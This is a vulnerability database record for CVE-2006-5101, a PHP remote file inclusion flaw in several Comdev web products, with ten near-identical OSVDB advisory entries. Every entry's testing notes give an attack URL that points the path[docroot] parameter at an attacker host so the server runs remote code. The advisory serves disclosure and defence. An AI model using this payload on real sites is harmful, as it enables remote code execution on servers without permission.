ID CVE-2006-5101 Type cve Reporter NVD Modified 2017-07-19T21:33:31
Description
PHP remote file inclusion vulnerability in include.php in Comdev CSV Importer 3.1 and possibly 4.1, as used in (1) Comdev Contact Form 3.1, (2) Comdev Customer Helpdesk 3.1, (3) Comdev Events Calendar 3.1, (4) Comdev FAQ Support 3.1, (5) Comdev Guestbook 3.1, (6) Comdev Links Directory 3.1, (7) Comdev News Publisher 3.1, (8) Comdev Newsletter 3.1, (9) Comdev Photo Gallery 3.1, (10) Comdev Vote Caster 3.1, (11) Comdev Web Blogger 3.1, and (12) Comdev eCommerce 3.1, allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter. NOTE: it has been reported that 4.1 versions might also be affected.
{"result": {"osvdb": [{"id": "OSVDB:29311", "type": "osvdb", "title": "Comdev Newsletter include.php path[docroot] Variable Remote File Inclusion", "description": "## Vulnerability Description\nComdev Newsletter contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nComdev Newsletter contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include.php?path[\"docroot\"]=http://[attacker]\n## References:\nVendor URL: http://www.comdevweb.com/\n[Secunia Advisory ID:22133](https://secuniaresearch.flexerasoftware.com/advisories/22133/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0462.html\nISS X-Force ID: 29220\nFrSIRT Advisory: ADV-2006-3814\n[CVE-2006-5101](https://vulners.com/cve/CVE-2006-5101)\n", "published": "2006-09-27T11:03:53", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29311", "cvelist": ["CVE-2006-5101"], "lastseen": "2017-04-28T13:20:25"}, {"id": "OSVDB:29308", "type": "osvdb", "title": "Comdev Customer Helpdesk include.php path[docroot] Variable Remote File Inclusion", "description": "## Vulnerability Description\nComdev Customer Helpdesk contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nComdev Customer Helpdesk contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include.php?path[\"docroot\"]=http://[attacker]\n## References:\nVendor URL: http://www.comdevweb.com/\n[Secunia Advisory ID:22154](https://secuniaresearch.flexerasoftware.com/advisories/22154/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0453.html\nISS X-Force ID: 29220\nFrSIRT Advisory: ADV-2006-3807\n[CVE-2006-5101](https://vulners.com/cve/CVE-2006-5101)\n", "published": "2006-09-27T10:18:38", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29308", "cvelist": ["CVE-2006-5101"], "lastseen": "2017-04-28T13:20:25"}, {"id": "OSVDB:29300", "type": "osvdb", "title": "Comdev Events Calendar include.php path[docroot] Variable Remote File Inclusion", "description": "## Vulnerability Description\nComdev Events Calendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nComdev Events Calendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include.php?path[\"docroot\"]=http://[attacker]\n## References:\nVendor URL: http://www.comdevweb.com/\n[Secunia Advisory ID:22120](https://secuniaresearch.flexerasoftware.com/advisories/22120/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0463.html\nISS X-Force ID: 29220\nFrSIRT Advisory: ADV-2006-3815\n[CVE-2006-5101](https://vulners.com/cve/CVE-2006-5101)\n", "published": "2006-09-27T12:48:31", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29300", "cvelist": ["CVE-2006-5101"], "lastseen": "2017-04-28T13:20:25"}, {"id": "OSVDB:29307", "type": "osvdb", "title": "Comdev eCommerce include.php path[docroot] Variable Remote File Inclusion", "description": "## Vulnerability Description\nComdev eCommerce contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nComdev eCommerce contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include.php?path[\"docroot\"]=http://[attacker]\n## References:\nVendor URL: http://www.comdevweb.com/\n[Secunia Advisory ID:22134](https://secuniaresearch.flexerasoftware.com/advisories/22134/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0457.html\nISS X-Force ID: 29220\nFrSIRT Advisory: ADV-2006-3810\n[CVE-2006-5101](https://vulners.com/cve/CVE-2006-5101)\n", "published": "2006-09-27T10:33:41", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29307", "cvelist": ["CVE-2006-5101"], "lastseen": "2017-04-28T13:20:25"}, {"id": "OSVDB:29305", "type": "osvdb", "title": "Comdev Guestbook include.php path[docroot] Variable Remote File Inclusion", "description": "## Vulnerability Description\nComdev Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nComdev Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include.php?path[\"docroot\"]=http://[attacker]\n## References:\nVendor URL: http://www.comdevweb.com/\n[Secunia Advisory ID:22147](https://secuniaresearch.flexerasoftware.com/advisories/22147/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0460.html\nISS X-Force ID: 29220\nFrSIRT Advisory: ADV-2006-3809\n[CVE-2006-5101](https://vulners.com/cve/CVE-2006-5101)\n", "published": "2006-09-27T11:19:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29305", "cvelist": ["CVE-2006-5101"], "lastseen": "2017-04-28T13:20:25"}, {"id": "OSVDB:29309", "type": "osvdb", "title": "Comdev Contact Form include.php path[docroot] Variable Remote File Inclusion", "description": "## Vulnerability Description\nComdev Contact Form contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nComdev Contact Form contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include.php?path[\"docroot\"]=http://[attacker]\n## References:\nVendor URL: http://www.comdevweb.com/\n[Secunia Advisory ID:22151](https://secuniaresearch.flexerasoftware.com/advisories/22151/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0454.html\nISS X-Force ID: 29220\nFrSIRT Advisory: ADV-2006-3811\n[CVE-2006-5101](https://vulners.com/cve/CVE-2006-5101)\n", "published": "2006-09-27T10:03:42", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29309", "cvelist": ["CVE-2006-5101"], "lastseen": "2017-04-28T13:20:25"}, {"id": "OSVDB:29303", "type": "osvdb", "title": "Comdev Web Blogger include.php path[docroot] Variable Remote File Inclusion", "description": "## Vulnerability Description\nComdev Web Blogger contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nComdev Web Blogger contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include.php?path[\"docroot\"]=http://[attacker]\n## References:\nVendor URL: http://www.comdevweb.com/\n[Secunia Advisory ID:22153](https://secuniaresearch.flexerasoftware.com/advisories/22153/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0456.html\nISS X-Force ID: 29220\nFrSIRT Advisory: ADV-2006-3813\n[CVE-2006-5101](https://vulners.com/cve/CVE-2006-5101)\n", "published": "2006-09-27T11:50:22", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29303", "cvelist": ["CVE-2006-5101"], "lastseen": "2017-04-28T13:20:25"}, {"id": "OSVDB:29299", "type": "osvdb", "title": "Comdev FAQ Support include.php path[docroot] Variable Remote File Inclusion", "description": "## Vulnerability Description\nComdev FAQ Support contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nComdev FAQ Support contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include.php?path[\"docroot\"]=http://[attacker]\n## References:\nVendor URL: http://www.comdevweb.com/\n[Secunia Advisory ID:22135](https://secuniaresearch.flexerasoftware.com/advisories/22135/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0461.html\nISS X-Force ID: 29220\nFrSIRT Advisory: ADV-2006-3808\n[CVE-2006-5101](https://vulners.com/cve/CVE-2006-5101)\n", "published": "2006-09-27T13:03:33", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29299", "cvelist": ["CVE-2006-5101"], "lastseen": "2017-04-28T13:20:25"}, {"id": "OSVDB:29304", "type": "osvdb", "title": "Comdev CSV Importer include.php path[docroot] Variable Remote File Inclusion", "description": "## Vulnerability Description\nComdev CSV Importer contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nComdev CSV Importer contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include.php?path[\"docroot\"]=http://[attacker]\n## References:\nVendor URL: http://www.comdevweb.com/\n[Secunia Advisory ID:22149](https://secuniaresearch.flexerasoftware.com/advisories/22149/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0459.html\nISS X-Force ID: 29220\nFrSIRT Advisory: ADV-2006-3812\n[CVE-2006-5101](https://vulners.com/cve/CVE-2006-5101)\n", "published": "2006-09-27T11:33:56", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29304", "cvelist": ["CVE-2006-5101"], "lastseen": "2017-04-28T13:20:25"}, {"id": "OSVDB:29306", "type": "osvdb", "title": "Comdev Links Directory include.php path[docroot] Variable Remote File Inclusion", "description": "## Vulnerability Description\nComdev Links Directory contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nComdev Links Directory contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to include.php not properly sanitizing user input supplied to the 'path[docroot]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include.php?path[\"docroot\"]=http://[attacker]\n## References:\nVendor URL: http://www.comdevweb.com/\n[Secunia Advisory ID:22170](https://secuniaresearch.flexerasoftware.com/advisories/22170/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0450.html\nISS X-Force ID: 29220\nFrSIRT Advisory: ADV-2006-3805\n[CVE-2006-5101](https://vulners.com/cve/CVE-2006-5101)\n", "published": "2006-09-27T10:48:43", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29306", "cvelist": ["CVE-2006-5101"], "lastseen": "2017-04-28T13:20:25"}]}}
